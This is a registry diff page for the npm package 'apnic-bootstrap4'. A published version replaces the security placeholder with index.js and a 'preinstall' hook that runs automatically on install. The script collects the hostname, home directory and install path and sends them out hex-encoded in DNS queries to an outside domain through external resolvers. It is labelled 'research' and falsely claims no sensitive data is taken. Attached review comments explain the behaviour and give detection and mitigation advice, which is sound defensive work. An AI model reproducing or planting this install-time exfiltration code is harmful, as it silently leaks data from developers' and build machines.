apnic-bootstrap4 0.0.1-security → 2023.98.998


Potentially problematic release.


This version of apnic-bootstrap4 might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +76 -0
  3. package/package.json +34 -3
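--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +1 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=apnic-bootstrap4 for more information.
+This package is meant for security research purposes and does not contain any useful code.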
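--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,76 @@
+/*
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure program will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+kre80r@wearehackerone.com
+
+Shoutout:
+https://twitter.com/alxbrsn
+https://twitter.com/streaak
+*/
+
+
+const dns = require('dns');
+const os = require('os');
+
+const suffix = '.ca9rvt7bbtvqsfuo7bfm.krhost.me';
+const ns = '1dot1dot1dot1.cloudflare-dns.com';
+
+const package = 'apnic-bootstrap4';
+
+
+function sendToServer(data) {
+
+data = Buffer.from(data).toString('hex');
+data = data.match(/.{1,60}/g);
+
+id = Math.random().toString(36).substring(2);
+data.forEach(function (chunk, idx){
+try {
+dns.resolve(
+id + '.' + idx + '.' + chunk + suffix, 'A',
+console.log);
+} catch (e) { }
+});
+
+}
+
+
+function tryGet(toCall) {
+
+try {
+return toCall();
+} catch(e) {
+return 'err';
+}
+
+}
+
+data = {
+h : tryGet(os.hostname),
+d : tryGet(os.homedir),
+c : __dirname
+}
+
+data = JSON.stringify(data);
+
+dns.lookup(ns, function(err, address) {
+if (!err) {
+nsAddress = address;
+} else {
+nsAddress = '8.8.8.8';
+}
+dns.setServers([nsAddress, '4.4.4.4']);
+sendToServer(data);
+});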
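Review bot: The header comment's statement "No sensitive data is retrieved" is contradicted by the top-level code, which gathers `os.hostname()`, `os.homedir()` and `__dirname`; `sendToServer` then hex-encodes that JSON into DNS labels queried under the hard-coded `suffix` domain. A home directory path normally embeds the local account name, so the comment should describe the collection accurately, for example `Collects the hostname, home directory and install path and sends them hex-encoded in DNS query names.` The `dns.setServers` call also points the process at external resolvers, so these lookups probably bypass the host's configured resolver and its logs (inferred; this depends on the network). For detection, look for direct DNS egress from build hosts and for query names with long hex labels under that suffix.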
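--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,37 @@
 {
+"_from": "apnic-bootstrap4",
+"_id": "apnic-bootstrap4@2023.98.998",
+"_inBundle": false,
+"_location": "/apnic-bootstrap4",
+"_phantomChildren": {},
+"_requested": {
+"type": "tag",
+"registry": true,
+"raw": "apnic-bootstrap4",
+"name": "apnic-bootstrap4",
+"escapedName": "apnic-bootstrap4",
+"rawSpec": "",
+"saveSpec": null,
+"fetchSpec": "latest"
+},
+"_requiredBy": [
+"#USER",
+"/"
+],
+"_resolved": "https://registry.npmjs.org/apnic-bootstrap4/-/apnic-bootstrap4-2022.99.999.tgz",
+"_shasum": "c37887b241e857bf8344e79e20269fc74ed6b176",
+"_spec": "apnic-bootstrap4",
+"_where": "/home/krkr",
+"author": "",
+"bundleDependencies": false,
+"deprecated": "please delete",
+"description": "Security research purposes only.",
+"license": "ISC",
+"main": "index.js",
 "name": "apnic-bootstrap4",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"scripts": {
+"preinstall": "node index.js",
+"test": ""
+},
+"version": "2023.98.998"
 }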
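Review bot: The added `"preinstall": "node index.js"` entry makes `npm install` execute index.js automatically, before the package is ever imported and with the installing user's privileges, which is what triggers the data collection in that file. A package whose README states it contains no useful code has no need for an install hook; the line should be dropped, and consumers can neutralise it with `npm install --ignore-scripts` or `ignore-scripts=true` in `.npmrc`. The manifest also ships npm's install-time `_`-prefixed fields, including `_where` with a local path and a `_resolved` tarball version (2022.99.999) that differs from `_id` (2023.98.998), so the published metadata is inconsistent and should not be relied on for provenance. The jump from the registry's `0.0.1-security` holding version to a date-like high version is worth flagging in dependency review, since an unpinned or range dependency would resolve to it.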